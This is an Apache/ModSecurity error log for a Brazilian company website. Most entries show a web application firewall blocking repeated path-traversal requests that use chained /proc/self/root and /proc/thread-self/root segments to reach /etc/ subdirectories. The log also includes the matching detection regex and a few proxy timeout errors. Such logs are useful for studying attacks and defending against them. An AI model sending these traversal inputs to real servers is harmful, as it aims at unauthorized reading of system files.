[Thu Mar 19 10:34:09.257374 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.243.128:56908] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv7Ufu8EFLIOrSqIpujCQAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:34:11.187641 2026] [:error] [pid 27293:tid 140411666392832] [client 74.7.243.128:54176] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv7U_-YZRR_7pZ7nDKJlgAAA8k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:34:21.142254 2026] [proxy_fcgi:error] [pid 14269:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:47810] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:34:25.801511 2026] [:error] [pid 14269:tid 140411725141760] [client 74.7.243.128:54192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv7YQbLMZ6AikZjR9VbQQAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:34:28.308159 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.243.128:58260] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv7ZAbLMZ6AikZjR9VbRAAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:34:31.844910 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:48470] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv7Z-yqAr6etmhZHNpewAAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:34:43.162652 2026] [proxy_fcgi:error] [pid 14269:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:48352] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:34:48.635779 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.243.128:48474] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv7ePu8EFLIOrSqIpujLAAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:35:06.209783 2026] [proxy_fcgi:error] [pid 17653:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:48820] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:35:28.627244 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:45192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv7oAkwaGbbGflqUZC-FQAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:35:30.113925 2026] [proxy_fcgi:error] [pid 17887:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:49428] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:35:49.695268 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.243.128:35742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv7tcdf6f5d65gmYZR0pgAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:35:51.645786 2026] [:error] [pid 14269:tid 140411565680384] [client 74.7.244.43:38404] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abv7twbLMZ6AikZjR9VbYAAAABU"]
[Thu Mar 19 10:35:51.656819 2026] [:error] [pid 14269:tid 140411641214720] [client 74.7.243.128:55070] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv7twbLMZ6AikZjR9VbYQAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:35:53.137783 2026] [proxy_fcgi:error] [pid 19093:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:50020] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:36:06.555431 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.243.128:55076] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv7xvu8EFLIOrSqIpujVwAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:36:10.723887 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:58204] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv7ygkwaGbbGflqUZC-LgAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:36:15.069935 2026] [proxy_fcgi:error] [pid 27293:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:50518] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:36:15.587154 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.243.128:36806] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv7z_u8EFLIOrSqIpujWgAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:36:17.632845 2026] [:error] [pid 14269:tid 140411658000128] [client 74.7.243.128:36808] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv70QbLMZ6AikZjR9VbaAAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:36:35.415819 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:36810] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv748df6f5d65gmYZR00AAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:36:41.137879 2026] [proxy_fcgi:error] [pid 15826:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:51010] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:36:49.191934 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:33178] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv78QkwaGbbGflqUZC-TQAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:36:51.551401 2026] [:error] [pid 27293:tid 140411725141760] [client 74.7.243.128:45876] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv78_-YZRR_7pZ7nDKJ2gAAA8I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:36:57.240517 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.243.128:45882] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv7-eyqAr6etmhZHNpe-wAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:36:59.374264 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:45890] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv7-_u8EFLIOrSqIpujeAAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:37:01.602077 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.243.128:39548] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv7_fu8EFLIOrSqIpujfAAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:37:10.133812 2026] [proxy_fcgi:error] [pid 17653:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:51526] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:37:41.917847 2026] [proxy_fcgi:error] [pid 26799:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:52184] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:37:48.330365 2026] [:error] [pid 27293:tid 140411725141760] [client 74.7.243.128:39552] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv8LP-YZRR_7pZ7nDKJ-AAAA8I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:38:03.083319 2026] [:error] [pid 27403:tid 140411674785536] [client 74.7.243.128:53034] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv8OxkFeYa1D6dYQnDuRwAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:38:14.139949 2026] [proxy_fcgi:error] [pid 30077:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:52956] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:38:43.057886 2026] [proxy_fcgi:error] [pid 30077:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:53764] AH01075: Error dispatching request to : (polling)
